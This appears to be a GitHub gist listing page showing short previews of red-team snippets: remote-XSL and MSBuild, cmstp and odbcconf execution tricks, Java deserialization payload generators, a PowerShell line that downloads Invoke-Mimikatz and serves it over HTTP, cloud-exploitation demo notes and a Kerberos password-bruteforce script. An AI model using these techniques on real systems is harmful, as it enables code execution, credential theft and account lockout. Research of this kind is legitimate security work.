This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0"?> | |
<?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?> | |
<customers> | |
<customer> | |
<name>Microsoft</name> | |
</customer> | |
</customers> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
;cmstp.exe /s cmstp.inf | |
[version] | |
Signature=$chicago$ | |
AdvancedINF=2.5 | |
[DefaultInstall_SingleUser] | |
UnRegisterOCXs=UnRegisterOCXSection | |
[UnRegisterOCXSection] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
To use with odbcconf.exe: | |
odbcconf /S /A {REGSVR odbcconf.dll} | |
or, from a remote location (if WebDAV support enabled): | |
odbcconf /S /A {REGSVR \\webdavaserver\dir\odbcconf.dll} | |
*/ | |
using System; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuild.xml --> | |
<Target Name="Hello"> | |
<SharpLauncher > | |
</SharpLauncher> | |
</Target> | |
<UsingTask | |
TaskName="SharpLauncher" | |
TaskFactory="CodeTaskFactory" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
DiabloHorn - https://diablohorn.com | |
For learning purposes we build the groovy payload ourselves instead of using | |
ysoserial. This helps us better understand the chain and the mechanisms | |
involved in exploiting this bug. | |
compile with: | |
javac -cp <path to groovy lib> ManualPayloadGenerate.java | |
Example: | |
javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
""" | |
DiabloHorn - https://diablohorn.com | |
References | |
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/ | |
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html | |
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html | |
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html | |
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ | |
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1") | |
$Hso = New-Object Net.HttpListener | |
$Hso.Prefixes.Add("http://+:8080/") | |
$Hso.Start() | |
While ($Hso.IsListening) { | |
$HC = $Hso.GetContext() | |
$HRes = $HC.Response | |
$HRes.Headers.Add("Content-Type","text/plain") | |
If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') { | |
$Buf = [Text.Encoding]::UTF8.GetBytes($mk) |
By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.
References:
- Blackhat Arsenal 2017 presentation: https://www.blackhat.com/us-17/arsenal.html#cumulus-a-cloud-exploitation-toolkit
- Cumulus - A Cloud Exploitation Toolkit: https://drive.google.com/file/d/0B2Ka7F_6TetSNFdfbkI1cnJHUTQ
- The code, see cumulus branch: https://github.com/godinezj/metasploit-framework
- xxe-example, see https://github.com/rgerganov/xxe-example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Title: kinit_brute.sh | |
# Author: @ropnop | |
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller | |
# The script configures the realm and KDC for you based on the domain provided and the domain controller | |
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf | |
# Only tested with Heimdal kerberos (error messages might be different for MIT clients) | |
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful |